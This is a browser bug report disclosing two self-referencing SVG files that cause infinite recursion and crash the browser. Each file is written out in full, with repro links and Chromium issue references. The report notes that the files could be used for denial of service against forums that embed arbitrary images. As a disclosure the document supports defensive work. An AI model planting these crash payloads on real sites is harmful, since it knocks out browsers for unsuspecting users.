Having an SVG image load itself through an svg "image" tag or an html "img" tag using foreignObject causes infinite recursion, which crashes the browser. I'm creating one bug for both because they are essentially caused by the same problem. Feel free to split them if you think that works better. -- html "img" tag -- <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"> <svg xmlns="http://www.w3.org/2000/svg" version="1.1" xmlns:xlink="http://www.w3.org/1999/xlink" width="1063" height="638"> <foreignObject> <body xmlns="http://www.w3.org/1999/xhtml"> <img src="[url to this .svg file]" /> </body> </foreignObject> </svg> Chromium bug: http://code.google.com/p/chromium/issues/detail?id=44995 Repro: http://skypher.com/SkyLined/Repro/Chrome/44995%20-%20WebCore..FrameView..paintContents%20RecursionSOV%20(1b0fa0eb19ffe8d1d29dd7a361a99ee0)/repro.svg -- svg "image" tag -- <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"> <svg xmlns="http://www.w3.org/2000/svg" version="1.1" xmlns:xlink="http://www.w3.org/1999/xlink" width="1063" height="638"> <image x="0" y="0" width="1063" height="638" xlink:href="[url to this .svg file]" /> </svg> Chromium bug: http://code.google.com/p/chromium/issues/detail?id=44998 Repro: http://skypher.com/SkyLined/Repro/Chrome/44998%20-%20WebCore..CachedImage..changedInRect%20RecursionSOV%20(512de755335cb1ab73932c04c63216ba)/repro.svg Marking as security: Because many chat/forum websites allow users to insert images with arbitrary URLs, these crashes can be used as a DoS against these websites.